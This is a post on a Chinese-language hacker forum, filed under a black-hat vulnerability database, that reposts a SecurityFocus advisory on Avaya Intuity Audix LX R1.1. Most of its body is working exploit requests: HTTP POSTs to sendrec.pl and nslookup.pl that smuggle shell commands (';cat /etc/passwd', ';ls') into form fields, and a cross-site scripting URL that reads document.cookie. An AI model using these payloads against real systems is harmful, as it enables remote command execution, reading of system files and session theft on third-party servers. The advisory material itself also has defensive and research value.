跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

Avaya Intuity Audix LX R1.1 - Multiple Remote Vulnerabilities

HACK1949
HACK1949
黑帽漏洞数据库

精选回复

发布于 
source: https://www.securityfocus.com/bid/36450/info

Avaya Intuity Audix LX is prone to multiple remote vulnerabilities, including:

1. Multiple remote command-execution vulnerabilities
2. A cross-site request-forgery vulnerability
3. A cross-site scripting vulnerability

Attackers can exploit these issues to execute arbitrary commands with the privileges of 'vexvm' on the underlying system, steal cookie-based authentication credentials, execute arbitrary script code, and perform administrative tasks. Other attacks are also possible. 

POST /cswebadm/diag/cgi-bin/sendrec.pl HTTP/1.1
ipadd=127.0.0.1;cat+/etc/passwd&count_p=1&size_p=56

POST https://www.example.com/cswebadm/diag/cgi-bin/sendrec.pl HTTP/1.1
ipadd=;cat+/etc/passwd

POST /cswebadm/diag/cgi-bin/sendrec.pl HTTP/1.1
ipadd=&count_p=1;ls&size_p=56

POST /cswebadm/diag/cgi-bin/sendrec.pl HTTP/1.1
ipadd=&count_p=1&size_p=56&opt_n=;ls

POST /cswebadm/diag/cgi-bin/nslookup.pl HTTP/1.1
host_or_ip=127.0.0.1&r_type=;ls;

https://www.example.com/cgi-bin/smallmenu.pl?url=%3C/
title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。